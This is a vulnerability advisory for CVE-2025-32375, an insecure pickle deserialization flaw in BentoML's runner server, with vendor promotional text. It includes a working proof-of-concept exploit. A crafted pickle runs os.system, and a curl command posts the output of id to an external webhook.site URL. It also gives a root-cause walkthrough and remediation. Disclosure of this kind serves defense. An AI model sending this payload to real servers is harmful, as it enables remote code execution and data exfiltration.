Summary
BentoML's runner server contains an insecure deserialization vulnerability. By setting specific headers and parameters in a POST request, an attacker can execute arbitrary code on the server without authorization, gaining initial access and exposing information held on the server.
PoC
- First, create a file named model.py to create a simple model and save it
import bentoml
import numpy as np

class mymodel:
    def predict(self, info):
        return np.abs(info)

    def __call__(self, info):
        return self.predict(info)

model = mymodel()
bentoml.picklable_model.save_model("mymodel", model)
- Then run the following command to save this model
python3 model.py
- Next, create bentofile.yaml to build this model
service: "service.py"
description: "A model serving service with BentoML"
python:
  packages:
    - bentoml
    - numpy
models:
  - tag: MyModel:latest
include:
  - "*.py"
- Then, create service.py to host this model
import bentoml
from bentoml.io import NumpyNdarray
import numpy as np

model_runner = bentoml.picklable_model.get("mymodel:latest").to_runner()

svc = bentoml.Service("myservice", runners=[model_runner])

@svc.api(input=NumpyNdarray(), output=NumpyNdarray())
async def predict(input_data: np.ndarray):
    input_columns = np.split(input_data, input_data.shape[1], axis=1)
    result_generator = model_runner.async_run(input_columns, is_stream=True)
    async for result in result_generator:
        yield result
- Then, run the following commands to build and host this model
bentoml build
bentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888
- Finally, run the Python script below (exploit.py) to exploit the insecure deserialization vulnerability in BentoML's runner server.
import requests
import pickle

url = "http://0.0.0.0:8888/"

headers = {
    "args-number": "1",
    "Content-Type": "application/vnd.bentoml.pickled",
    "Payload-Container": "NdarrayContainer",
    "Payload-Meta": '{"format": "default"}',
    "Batch-Size": "-1",
}

class P:
    def __reduce__(self):
        return (__import__('os').system, ('curl -X POST -d "$(id)" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3',))

response = requests.post(url, headers=headers, data=pickle.dumps(P()))
print(response)
Replacing NdarrayContainer with PandasDataFrameContainer in the Payload-Container header also works; the exploit still succeeds.
After exploit.py runs, the output of the id command is sent to the webhook server.
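A single POST body is enough because unpickling calls whatever callable an object's __reduce__ returned at pickling time. The following is a minimal, harmless sketch of that mechanism, with the built-in sorted standing in for os.system. The class name Demo is hypothetical and is not part of the PoC.

```python
import pickle


class Demo:
    """Hypothetical stand-in for the PoC's class P, using a harmless callable."""

    def __reduce__(self):
        # pickle stores (callable, args); pickle.loads later calls callable(*args).
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Demo())

# Unpickling does not rebuild a Demo instance; it returns sorted([3, 1, 2]).
result = pickle.loads(blob)
print(result)
```

The receiver never needs the Demo class: the pickle stream only names the callable and its arguments, which is why the server runs attacker-chosen code without any attacker code being installed.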
Root Cause Analysis:
- When the BentoML runner server handles a request in src/bentoml/_internal/server/runner_app.py and the request header args-number is equal to 1, it calls the function _deserialize_single_param, as in the code below:
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298
async def _request_handler(request: Request) -> Response:
    assert self._is_ready

    arg_num = int(request.headers["args-number"])
    r_: bytes = await request.body()

    if arg_num == 1:
        params: Params[t.Any] = _deserialize_single_param(request, r_)
- _deserialize_single_param then reads the Payload-Container, Payload-Meta, and Batch-Size request headers and builds a Payload object whose data is the raw request body
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393
def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
    container = request.headers["Payload-Container"]
    meta = json.loads(request.headers["Payload-Meta"])
    batch_size = int(request.headers["Batch-Size"])
    kwarg_name = request.headers.get("Kwarg-Name")
    payload = Payload(
        data=bs,
        meta=meta,
        batch_size=batch_size,
        container=container,
    )
    if kwarg_name:
        d = {kwarg_name: payload}
        params: Params[t.Any] = Params(**d)
    else:
        params: Params[t.Any] = Params(payload)

    return params
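To make the data flow concrete, here is a minimal sketch of the same header parsing, using a stand-in dataclass and a plain dict for the headers. SketchPayload and build_payload are hypothetical names for illustration, not BentoML APIs. The point is that every field of the resulting object comes straight from the request.

```python
import json
from dataclasses import dataclass
from typing import Any, Dict


@dataclass
class SketchPayload:
    """Hypothetical stand-in for BentoML's Payload."""

    data: bytes
    meta: Dict[str, Any]
    container: str
    batch_size: int = -1


def build_payload(headers: Dict[str, str], body: bytes) -> SketchPayload:
    # Same header handling as the excerpt above: values are parsed, not validated.
    return SketchPayload(
        data=body,
        meta=json.loads(headers["Payload-Meta"]),
        container=headers["Payload-Container"],
        batch_size=int(headers["Batch-Size"]),
    )


payload = build_payload(
    {
        "Payload-Container": "NdarrayContainer",
        "Payload-Meta": '{"format": "default"}',
        "Batch-Size": "-1",
    },
    b"raw request body",
)
print(payload)
```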
- After building the Params object that contains the payload, the handler calls the function infer with the params variable as input
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304
try:
    payload = await infer(params)
- Inside infer, the params variable, which is an instance of the Params class, calls that class's map function with AutoContainer.from_payload as the argument.
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289
async def infer(params: Params[t.Any]) -> Payload:
    params = params.map(AutoContainer.from_payload)

    try:
        ret = await runner_method.async_run(
            *params.args, **params.kwargs
        )
    except Exception:
        traceback.print_exc()
        raise

    return AutoContainer.to_payload(ret, 0)
- The Params class defines the map function, which applies the given function, here AutoContainer.from_payload, to every positional and keyword value. Each value is a Payload carrying data, meta, batch_size, and container
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66
def map(self, function: t.Callable[[T], To]) -> Params[To]:
    """
    Apply a function to all the values in the Params and return a Params of the
    return values.
    """
    args = tuple(function(a) for a in self.args)
    kwargs = {k: function(v) for k, v in self.kwargs.items()}
    return Params[To](*args, **kwargs)
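The effect of map is easier to see on a reduced example. The sketch below assumes a simplified stand-in class, MiniParams (a hypothetical name, not the BentoML class), and uses bytes.decode as the mapped function. In the runner server the mapped function is AutoContainer.from_payload, so every argument in the request is deserialized.

```python
from typing import Any, Callable


class MiniParams:
    """Hypothetical, simplified stand-in for BentoML's Params."""

    def __init__(self, *args: Any, **kwargs: Any) -> None:
        self.args = args
        self.kwargs = kwargs

    def map(self, function: Callable[[Any], Any]) -> "MiniParams":
        # Apply the function to every positional and keyword value.
        args = tuple(function(a) for a in self.args)
        kwargs = {k: function(v) for k, v in self.kwargs.items()}
        return MiniParams(*args, **kwargs)


params = MiniParams(b"first", extra=b"second")
decoded = params.map(bytes.decode)
print(decoded.args, decoded.kwargs)
```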
- The AutoContainer class defines the function from_payload, which looks up the container class named by payload.container (the value of the Payload-Container header) and returns the result of calling from_payload on the chosen class
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712
def from_payload(cls, payload: Payload) -> t.Any:
    container_cls = DataContainerRegistry.find_by_name(payload.container)
    return container_cls.from_payload(payload)
If the attacker sets the Payload-Container header to NdarrayContainer or PandasDataFrameContainer, the corresponding from_payload is called. It checks whether payload.meta["format"] == "default" and, if so, calls pickle.loads(payload.data). Both values are attacker-controlled: payload.meta["format"] comes from the Payload-Meta header, which the attacker can set to {"format": "default"}, and payload.data is the request body, which in my request is the pickled malicious class P. Unpickling it invokes the callable returned by the __reduce__ method and executes arbitrary commands (the curl command in my example).
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416
def from_payload(
    cls,
    payload: Payload,
) -> ext.PdDataFrame:
    if payload.meta["format"] == "default":
        return pickle.loads(payload.data)
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312
def from_payload(
    cls,
    payload: Payload,
) -> ext.NpNDArray:
    format = payload.meta.get("format", "default")
    if format == "default":
        return pickle.loads(payload.data)
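The last two steps, the name-based lookup and the pickle.loads call, can be reproduced in isolation. The sketch below assumes simplified stand-ins (ChainPayload, SketchNdarrayContainer, REGISTRY, and dispatch are hypothetical names, not BentoML code) and uses the built-in len in place of os.system so that it is safe to run.

```python
import pickle
from dataclasses import dataclass
from typing import Any, Dict


@dataclass
class ChainPayload:
    """Hypothetical stand-in for BentoML's Payload."""

    data: bytes
    meta: Dict[str, Any]
    container: str


class SketchNdarrayContainer:
    @classmethod
    def from_payload(cls, payload: ChainPayload) -> Any:
        # Same shape as the excerpt above: the "default" format means pickle.
        if payload.meta.get("format", "default") == "default":
            return pickle.loads(payload.data)
        raise ValueError("unsupported format")


# Name-based lookup, keyed by the value of the Payload-Container header.
REGISTRY = {"NdarrayContainer": SketchNdarrayContainer}


def dispatch(payload: ChainPayload) -> Any:
    container_cls = REGISTRY[payload.container]
    return container_cls.from_payload(payload)


class Benign:
    def __reduce__(self):
        # Harmless callable in place of os.system.
        return (len, ("attacker chose this call",))


payload = ChainPayload(
    data=pickle.dumps(Benign()),
    meta={"format": "default"},
    container="NdarrayContainer",
)
result = dispatch(payload)
print(result)
```

The container is supposed to return an array, but the value that comes back is whatever the attacker's callable produced, which shows that the declared return type offers no protection.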
Impact
In the proof of concept above, I showed how an attacker can run the id command and send its output to an external server. By replacing id with any other OS command, an attacker can use this insecure deserialization in BentoML's runner server to obtain a remote shell on the server and install backdoors for persistent access.
Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect. Typical impact: arbitrary code execution or logic abuse.
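One general way to limit what a pickle stream can do is the restricted unpickler pattern from the Python standard library documentation, which overrides find_class to allow only a short list of globals. The sketch below illustrates that pattern only. It is not the fix shipped in bentoml 1.4.8, the allowlist is an arbitrary assumption, and it does not make pickle suitable for untrusted input in general.

```python
import builtins
import io
import pickle

# Assumed allowlist for illustration; a real one depends on the data expected.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve only allowlisted builtins; refuse every other global.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but with the allowlist above enforced."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    def __reduce__(self):
        # sorted is harmless, but it is not on the allowlist.
        return (sorted, ([3, 1, 2],))


allowed = restricted_loads(pickle.dumps([1, 2, range(3)]))

try:
    restricted_loads(pickle.dumps(Probe()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(allowed, blocked)
```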
CVE-2025-32375 has a CVSS score of 9.8 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.4.8); upgrading removes the vulnerable code path.
Affected versions
bentoml (pip): >= 1.0.0a1, < 1.4.8
Security releases
bentoml (pip): 1.4.8
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-32375? CVE-2025-32375 is a critical-severity insecure deserialization vulnerability in bentoml (pip), affecting versions >= 1.0.0a1, < 1.4.8. It is fixed in 1.4.8. Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect.
- How severe is CVE-2025-32375? CVE-2025-32375 has a CVSS score of 9.8 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of bentoml are affected by CVE-2025-32375? bentoml (pip) versions >= 1.0.0a1, < 1.4.8 are affected.
- Is there a fix for CVE-2025-32375? Yes. CVE-2025-32375 is fixed in 1.4.8. Upgrade to this version or later.
- Is CVE-2025-32375 exploitable, and should I be worried? Whether CVE-2025-32375 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2025-32375 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-32375? Upgrade bentoml to 1.4.8 or later.
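To check whether an installed copy falls inside the affected range, a small script can compare the installed version against the bounds given above. The sketch below is an illustration under stated assumptions: release_tuple and is_affected are hypothetical helper names, and the comparison deliberately ignores pre-release suffixes, so a string such as 1.4.8rc1 is treated like 1.4.8.

```python
import re
from importlib import metadata
from typing import Tuple


def release_tuple(version: str) -> Tuple[int, ...]:
    """Return the leading numeric release segment, padded to three parts."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = tuple(int(part) for part in match.group().split("."))
    return parts + (0,) * (3 - len(parts))


def is_affected(version: str) -> bool:
    # Affected range from the advisory: >= 1.0.0a1, < 1.4.8.
    # Simplification: pre-release suffixes are ignored.
    return (1, 0, 0) <= release_tuple(version) < (1, 4, 8)


try:
    installed = metadata.version("bentoml")
    status = "affected" if is_affected(installed) else "outside the affected range"
    print(f"bentoml {installed}: {status}")
except metadata.PackageNotFoundError:
    print("bentoml is not installed in this environment")
```

A result of "outside the affected range" only reflects the version number; it says nothing about whether a runner server is exposed to untrusted networks.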